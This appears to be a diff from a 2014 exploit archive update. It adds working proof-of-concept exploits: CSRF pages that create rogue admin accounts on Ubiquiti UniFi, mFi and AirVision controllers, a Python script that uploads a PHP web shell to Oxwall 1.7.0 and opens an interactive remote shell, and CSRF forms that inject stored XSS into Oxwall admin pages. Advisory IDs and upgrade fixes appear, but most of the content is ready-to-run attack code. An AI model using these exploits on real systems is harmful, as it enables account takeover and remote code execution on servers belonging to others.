Updated 07_30_2014

files.csv

@@ -30792,3 +30792,6 @@ id,file,description,date,author,platform,type,port
 34184,platforms/hardware/remote/34184.txt,"Trend Micro InterScan Web Security Virtual Appliance Multiple Vulnerabilities",2010-06-14,"Ivan Huertas",hardware,remote,0
 34185,platforms/php/webapps/34185.txt,"Pre Projects Multi-Vendor Shopping Malls 'products.php' SQL Injection Vulnerability",2010-06-23,CoBRa_21,php,webapps,0
 34186,platforms/multiple/remote/34186.txt,"Apache Axis2 1.x '/axis2/axis2-admin' Session Fixation Vulnerability",2010-06-23,"Tiago Ferreira Barbosa",multiple,remote,0
+34187,platforms/hardware/webapps/34187.txt,"Ubiquiti UbiFi / mFi / AirVision - CSRF Vulnerability",2014-07-28,"Seth Art",hardware,webapps,80
+34190,platforms/php/webapps/34190.txt,"Oxwall 1.7.0 - Multiple CSRF And HTML Injection Vulnerabilities",2014-07-28,LiquidWorm,php,webapps,80
+34191,platforms/php/remote/34191.py,"Oxwall 1.7.0 - Remote Code Execution Exploit",2014-07-28,LiquidWorm,php,remote,80

platforms/hardware/webapps/34187.txt

@@ -0,0 +1,142 @@
+# Vendor Homepage: (http://www.ubnt.com/)
+
+# Tested on: Kali Linux
+-----------------------------------------
+Affected Products/Versions:
+-----------------------------------------
+UniFi Controller v2.4.6
+mFi Controller v2.0.15
+AirVision Controller v2.1.3
+Note: Previous versions may be affected
+
+
+-----------------
+Description:
+-----------------
+Title: Cross-site Request Forgery (CSRF)
+CVE: CVE-2014-2225
+CWE: http://cwe.mitre.org/data/definitions/352.html
+
+
+Detailed writeup: http://sethsec.blogspot.com/2014/07/cve-2014-2225.html
+Researcher: Seth Art - @sethsec
+
+---------------
+UniFi POC:
+
+---------------
+
+<html>
+<head>
+<script>
+function sendCSRF()
+{
+var url_base = "https://192.168.0.106:8443/api/add/admin"
+
+var post_data="%7B%22name%22%3A%22csrf%22%2C%22lang%22%3A%22en_US%22%2C%22x_password%22%3A%22csrf%22%7D"
+
+var xmlhttp;
+xmlhttp = new XMLHttpRequest();
+xmlhttp.open("POST", url_base, true);
+xmlhttp.setRequestHeader("Accept","*/*");
+xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded;
+
+
+charset=UTF-8");
+xmlhttp.withCredentials= "true";
+xmlhttp.send(post_data);
+}
+
+</script>
+</head>
+<body>
+<h1>CSRF POC</h1>
+Sending CSRF Payload!!!
+
+<body onload="sendCSRF()">
+
+</body>
+
+-------------
+mFi POC:
+-------------
+<html>
+<head>
+<script>
+function sendCSRF()
+{
+var url_base = "https://192.168.0.106:6443/api/v1.0/add/admin"
+
+
+var post_data="%7B%22name%22%3A%22csrf%22%2C%22lang%22%3A%22en_US%22%2C%22x_password%22%3A%22csrf%22%7D"
+
+var xmlhttp;
+xmlhttp = new XMLHttpRequest();
+xmlhttp.open("POST", url_base, true);
+
+
+xmlhttp.setRequestHeader("Accept","*/*");
+xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded;
+charset=UTF-8");
+xmlhttp.withCredentials= "true";
+
+
+xmlhttp.send(post_data);
+}
+
+</script>
+</head>
+<body>
+<h1>CSRF POC</h1>
+Sending CSRF Payload!!!
+<body onload="sendCSRF()">
+</body>
+
+
+
+--------------------
+
+AirVision POC:
+--------------------
+<html>
+<head>
+<script>
+function sendCSRF()
+{
+var url_base = "https://192.168.0.106:7443/api/v2.0/admin"
+
+
+var post_data="{\”name\”:\”csrf\”,\”email\”:\”csrf@gmail.com\”,\”userGroup:\”:\”admin\”,\”x_password\”:\”password\”,\”confirmPassword\”:\”password\”,\”disabled\”:\”false\”}”
+
+
+var xmlhttp;
+xmlhttp = new XMLHttpRequest();
+xmlhttp.open("POST", url_base, true);
+xmlhttp.setRequestHeader("Accept","*/*");
+xmlhttp.setRequestHeader("Content-type","application/plain; charset=UTF-8");
+
+
+xmlhttp.withCredentials= "true";
+xmlhttp.send(post_data);
+}
+
+</script>
+</head>
+<body>
+<h1>CSRF POC</h1>
+Sending CSRF Payload!!!
+<body onload="sendCSRF()">
+
+
+</body>
+
+
+
+-------------
+Solution:
+-------------
+UniFi Controller - Upgrade to UniFi Controller v3.2.1 or greater
+mFi Controller - Upgrade to mFi Controller v2.0.24 or greater
+AirVision Controller - Upgrade to UniFi Video v3.0.1 or greater (Note:
+
+The application name changed from AirVision to UniFi Video)

platforms/php/remote/34191.py

@@ -0,0 +1,281 @@
+#!/usr/bin/env python
+#
+#
+# Oxwall 1.7.0 Remote Code Execution Exploit
+#
+#
+# Vendor: Oxwall Software Foundation
+# Product web page: http://www.oxwall.org
+# Affected version: 1.7.0 (build 7907 and 7906)
+#
+# Summary: Oxwall is unbelievably flexible and easy to use PHP/MySQL
+# social networking software platform.
+#
+# Desc: Oxwall suffers from an authenticated arbitrary PHP code
+# execution. The vulnerability is caused due to the improper
+# verification of uploaded files in '/admin/settings/user' script
+# thru the 'avatar' and 'bigAvatar' POST parameters. This can be
+# exploited to execute arbitrary PHP code by uploading a malicious
+# PHP script file with '.php5' extension (to bypass the '.htaccess'
+# block rule) that will be stored in '/ow_userfiles/plugins/base/avatars/'
+# directory.
+#
+# Tested on: Kali Linux 3.7-trunk-686-pae
+#    	     Apache/2.2.22 (Debian)
+#            PHP 5.4.4-13(apache2handler)
+#            MySQL 5.5.28
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+#
+# Zero Science Lab - http://www.zeroscience.mk
+# Macedonian Information Security Research And Development Laboratory
+#
+#
+# Advisory ID: ZSL-2014-5196
+# Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2014-5196.php
+#
+#
+# 18.07.2014
+#
+#
+
+version = '3.0.0.251'
+
+import itertools, mimetools, mimetypes
+import cookielib, urllib, urllib2, sys
+import logging, os, time, datetime, re
+
+from colorama import Fore, Back, Style, init
+from cStringIO import StringIO
+from urllib2 import URLError
+
+init()
+
+if os.name == 'posix': os.system('clear')
+if os.name == 'nt': os.system('cls')
+piton = os.path.basename(sys.argv[0])
+
+def bannerche():
+	print '''
+ @---------------------------------------------------------------@
+ |                                                               |
+ |          Oxwall 1.7.0 Remote Code Execution Exploit           |
+ |                                                               |
+ |                                                               |
+ |                       ID: ZSL-2014-5196                       |
+ |                                                               |
+ |              Copyleft (c) 2014, Zero Science Lab              |
+ |                                                               |
+ @---------------------------------------------------------------@
+          '''
+	if len(sys.argv) < 2:
+		print '\n\x20\x20[*] '+Fore.YELLOW+'Usage: '+Fore.RESET+piton+' <hostname>\n'
+		print '\x20\x20[*] '+Fore.CYAN+'Example: '+Fore.RESET+piton+' zeroscience.mk\n'
+		sys.exit()
+
+bannerche()
+
+print '\n\x20\x20[*] Initialising exploit '+'.'*34+Fore.GREEN+'[OK]'+Fore.RESET
+
+host = sys.argv[1]
+
+cj = cookielib.CookieJar()
+opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
+
+try:
+	opener.open('http://'+host+'/sign-in?back-uri=admin')
+except urllib2.HTTPError, errorzio:
+	if errorzio.code == 404:
+		print '\x20\x20[*] Checking path '+'.'*41+Fore.RED+'[ER]'+Fore.RESET
+		print '\x20\x20[*] '+Fore.YELLOW+'Check your path entry.'+Fore.RESET
+		print
+		sys.exit()
+except URLError, errorziocvaj:
+	if errorziocvaj.reason:
+		print '\x20\x20[*] Checking host '+'.'*41+Fore.RED+'[ER]'+Fore.RESET
+		print '\x20\x20[*] '+Fore.YELLOW+'Check your hostname entry.'+Fore.RESET
+		print
+		sys.exit()
+
+print '\x20\x20[*] Checking host and path '+'.'*32+Fore.GREEN+'[OK]'+Fore.RESET
+print '\x20\x20[*] Login please.'
+
+username = raw_input('\x20\x20[*] Enter username: ')
+password = raw_input('\x20\x20[*] Enter password: ')
+
+login_data = urllib.urlencode({
+							'form_name' : 'sign-in',
+							'identity' : username,
+							'password' : password,
+							'remember' : 'on',
+							'submit' : 'Sign In'
+							})
+
+try:
+	login = opener.open('http://'+host+'/sign-in?back-uri=admin', login_data)
+	auth = login.read()
+except urllib2.HTTPError, errorziotraj:
+	if errorziotraj.code == 403:
+		print '\x20\x20[*] '+Fore.RED+'Blocked by WAF.'+Fore.RESET
+		print
+		sys.exit()
+
+for session in cj:
+	sessid = session.name
+
+print '\x20\x20[*] Mapping session ID '+'.'*36+Fore.GREEN+'[OK]'+Fore.RESET
+ses_chk = re.search(r'%s=\w+' % sessid , str(cj))
+cookie = ses_chk.group(0)
+print '\x20\x20[*] Cookie: '+Fore.YELLOW+cookie+Fore.RESET
+
+if re.search(r'Invalid username or email', auth):
+	print '\x20\x20[*] Invalid username or email given '+'.'*23+Fore.RED+'[ER]'+Fore.RESET
+	print
+	sys.exit()
+elif re.search(r'Invalid password', auth):
+	print '\x20\x20[*] Invalid password '+'.'*38+Fore.RED+'[ER]'+Fore.RESET
+	sys.exit()
+else:
+	print '\x20\x20[*] Authenticated '+'.'*41+Fore.GREEN+'[OK]'+Fore.RESET
+
+
+class MultiPartForm(object):
+
+    def __init__(self):
+        self.form_fields = []
+        self.files = []
+        self.boundary = mimetools.choose_boundary()
+        return
+    
+    def get_content_type(self):
+        return 'multipart/form-data; boundary=%s' % self.boundary
+
+    def add_field(self, name, value):
+        self.form_fields.append((name, value))
+        return
+
+    def add_file(self, fieldname, filename, fileHandle, mimetype=None):
+        body = fileHandle.read()
+        if mimetype is None:
+            mimetype = mimetypes.guess_type(filename)[0] or 'application/octet-stream'
+        self.files.append((fieldname, filename, mimetype, body))
+        return
+    
+    def __str__(self):
+
+        parts = []
+        part_boundary = '--' + self.boundary
+        
+        parts.extend(
+            [ part_boundary,
+              'Content-Disposition: form-data; name="%s"' % name,
+              '',
+              value,
+            ]
+            for name, value in self.form_fields
+            )
+        
+        parts.extend(
+            [ part_boundary,
+              'Content-Disposition: file; name="%s"; filename="%s"' % \
+                 (field_name, filename),
+              'Content-Type: %s' % content_type,
+              '',
+              body,
+            ]
+            for field_name, filename, content_type, body in self.files
+            )
+        
+        flattened = list(itertools.chain(*parts))
+        flattened.append('--' + self.boundary + '--')
+        flattened.append('')
+        return '\r\n'.join(flattened)
+
+if __name__ == '__main__':
+
+    form = MultiPartForm()
+    form.add_field('form_name', 'userSettingsForm')
+    form.add_field('displayName', 'realname')
+    form.add_field('confirmEmail', 'on')
+    form.add_field('avatarSize', '90')
+    form.add_field('bigAvatarSize', '190')
+    form.add_field('avatar', '')
+    form.add_field('join_display_photo_upload', 'display')
+    form.add_field('save', 'Save')
+    
+    form.add_file('bigAvatar', 'thricerbd.php5', 
+                  fileHandle=StringIO('<?php system(\'echo \"<?php echo \\"<pre>\\"; passthru(\$_GET[\\\'cmd\\\']); echo \\"</pre>\\"; ?>\" > liwo.php5\'); ?>'))
+
+    request = urllib2.Request('http://'+host+'/admin/settings/user')
+    request.add_header('User-agent', 'joxypoxy 3.0')
+    body = str(form)
+    request.add_header('Content-type', form.get_content_type())
+    request.add_header('Cookie', cookie)
+    request.add_header('Content-length', len(body))
+    request.add_data(body)
+    request.get_data()
+    urllib2.urlopen(request).read()
+    print '\x20\x20[*] Sending payload '+'.'*39+Fore.GREEN+'[OK]'+Fore.RESET
+    checkfilename = urllib2.urlopen(request).read()
+    filename = re.search('default_avatar_big_(\w+)', checkfilename).group(1)
+    print '\x20\x20[*] Getting file name '+'.'*37+Fore.GREEN+'[OK]'+Fore.RESET
+    print '\x20\x20[*] File name: '+Fore.YELLOW+'default_avatar_big_'+filename+'.php5'+Fore.RESET
+
+opener.open('http://'+host+'/ow_userfiles/plugins/base/avatars/default_avatar_big_'+filename+'.php5')
+print '\x20\x20[*] Persisting file liwo.php5 '+'.'*29+Fore.GREEN+'[OK]'+Fore.RESET
+
+print '\x20\x20[*] Starting logging service '+'.'*30+Fore.GREEN+'[OK]'+Fore.RESET
+print '\x20\x20[*] Spawning shell '+'.'*40+Fore.GREEN+'[OK]'+Fore.RESET
+time.sleep(1)
+
+furl = '/ow_userfiles/plugins/base/avatars/liwo.php5'
+
+print
+today = datetime.date.today()
+fname = 'oxwall-'+today.strftime('%d-%b-%Y')+time.strftime('_%H%M%S')+'.log'
+logging.basicConfig(filename=fname,level=logging.DEBUG)
+
+logging.info(' '+'+'*75)
+logging.info(' +')
+logging.info(' + Log started: '+today.strftime('%A, %d-%b-%Y')+time.strftime(', %H:%M:%S'))
+logging.info(' + Title: Oxwall 1.7.0 Remote Code Execution Exploit')
+logging.info(' + Python program executed: '+sys.argv[0])
+logging.info(' + Version: '+version)
+logging.info(' + Full query: \''+piton+'\x20'+host+'\'')
+logging.info(' + Username input: '+username)
+logging.info(' + Password input: '+password)
+logging.info(' + Vector: '+'http://'+host+furl)
+logging.info(' +')
+logging.info(' + Advisory ID: ZSL-2014-5196')
+logging.info(' + Zero Science Lab - http://www.zeroscience.mk')
+logging.info(' +')
+logging.info(' '+'+'*75+'\n')
+
+print Style.DIM+Fore.CYAN+'\x20\x20[*] Press [ ENTER ] to INSERT COIN!\n'+Style.RESET_ALL+Fore.RESET
+raw_input()
+while True:
+	try:
+		cmd = raw_input(Fore.RED+'shell@'+host+':~# '+Fore.RESET)
+		execute = opener.open('http://'+host+furl+'?cmd='+urllib.quote(cmd))
+		reverse = execute.read()
+		pattern = re.compile(r'<pre>(.*?)</pre>',re.S|re.M)
+
+		print Style.BRIGHT+Fore.CYAN
+		cmdout = pattern.match(reverse)
+		print cmdout.groups()[0].strip()
+		print Style.RESET_ALL+Fore.RESET
+
+		if cmd.strip() == 'exit':
+			break
+
+		logging.info('Command executed: '+cmd+'\n\nOutput: \n'+'='*8+'\n\n'+cmdout.groups()[0].strip()+'\n\n'+'-'*60+'\n')
+	except Exception:
+		break
+
+logging.warning('\n\nLog ended: '+today.strftime('%A, %d-%b-%Y')+time.strftime(', %H:%M:%S')+'\n\nEND OF LOG')
+print '\x20\x20[*] Carpe commentarius '+'.'*36+Fore.GREEN+'[OK]'+Fore.RESET
+print '\x20\x20[*] Log file: '+Fore.YELLOW+fname+Fore.RESET
+print
+
+sys.exit()

platforms/php/webapps/34190.txt

@@ -0,0 +1,101 @@
+<!--
+
+Oxwall 1.7.0 Multiple CSRF And HTML Injection Vulnerabilities
+
+
+Vendor: Oxwall Software Foundation
+
+Product web page: http://www.oxwall.org
+Affected version: 1.7.0 (build 7907 and 7906)
+
+Summary: Oxwall is unbelievably flexible and easy to use
+PHP/MySQL social networking software platform.
+
+Desc: Oxwall version 1.7.0 suffers from multiple cross-site
+request forgery and stored xss vulnerabilities. The application
+allows users to perform certain actions via HTTP requests
+without performing any validity checks to verify the requests.
+This can be exploited to perform certain actions with administrative
+privileges if a logged-in user visits a malicious web site.
+Input passed to several POST parameters is not properly
+sanitised before being returned to the user. This can be
+exploited to execute arbitrary HTML and script code in a
+user's browser session in context of an affected site.
+
+Tested on: Kali Linux 3.7-trunk-686-pae
+           Apache/2.2.22 (Debian)
+           PHP 5.4.4-13(apache2handler)
+           MySQL 5.5.28
+
+
+Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
+                              @zeroscience
+
+
+Advisory ID: ZSL-2014-5195
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5195.php
+
+
+
+18.07.2014
+
+-->
+
+
+<html>
+<title>Oxwall 1.7.0 Multiple CSRF And Stored XSS Vulnerabilities</title>
+<body>
+
+
+<form action="http://192.168.0.105/admin/users/roles/" method="POST">
+<input type="hidden" name="form_name" value="add-role" />
+<input type="hidden" name="label" value='"><script>alert(1);</script>' />
+<input type="hidden" name="submit" value="Add" />
+<input type="submit" value="Execute #1" />
+</form>
+
+
+<form action="http://192.168.0.105/admin/questions/ajax-responder/" method="POST">
+<input type="hidden" name="form_name" value="account_type_49693e2b1cb50cad5c42b18a9103f146dcce2ec6" />
+<input type="hidden" name="command" value="AddAccountType" />
+<input type="hidden" name="key" value="questions_account_type_5615100a931845eca8da20cfdf7327e0" />
+<input type="hidden" name="prefix" value="base" />
+<input type="hidden" name="accountTypeName" value="5615100a931845eca8da20cfdf7327e0" />
+<input type="hidden" name="lang[1][base][questions_account_type_5615100a931845eca8da20cfdf7327e0]" value='"><script>alert(2);</script>' />
+<input type="hidden" name="role" value="12" />
+<input type="submit" value="Execute #2" />
+</form>
+
+
+<form action="http://192.168.0.105/admin/questions/ajax-responder/" method="POST">
+<input type="hidden" name="form_name" value="qst_add_form" />
+<input type="hidden" name="qst_name" value='"><script>alert(3);</script>' />
+<input type="hidden" name="qst_description" value="ZSL" />
+<input type="hidden" name="qst_account_type[0]" value="290365aadde35a97f11207ca7e4279cc" />
+<input type="hidden" name="qst_section" value="f90cde5913235d172603cc4e7b9726e3" />
+<input type="hidden" name="qst_answer_type" value="text" />
+<input type="hidden" name="qst_possible_values" value="%5B%5D" />
+<input type="hidden" name="year_range[to]" value="1996" />
+<input type="hidden" name="year_range[from]" value="1930" />
+<input type="hidden" name="qst_column_count" value="1" />
+<input type="hidden" name="qst_required" value="" />
+<input type="hidden" name="qst_on_sign_up" value="" />
+<input type="hidden" name="qst_on_edit" value="" />
+<input type="hidden" name="qst_on_view" value="" />
+<input type="hidden" name="qst_on_search" value="" />
+<input type="hidden" name="valuesStorage" value="%7B%7D" />
+<input type="hidden" name="command" value="addQuestion" />
+<input type="submit" value="Execute #3" />
+</form>
+
+
+<form action="http://192.168.0.105/admin/restricted-usernames" method="POST">
+<input type="hidden" name="form_name" value='restrictedUsernamesForm"><script>alert(4);</script>' />
+<input type="hidden" name="restrictedUsername" value='"><script>alert(5);</script>' />
+<input type="hidden" name="addUsername" value="Add" />
+<input type="submit" value="Execute #4 & #5" />
+</form>
+
+
+</body>
+</html>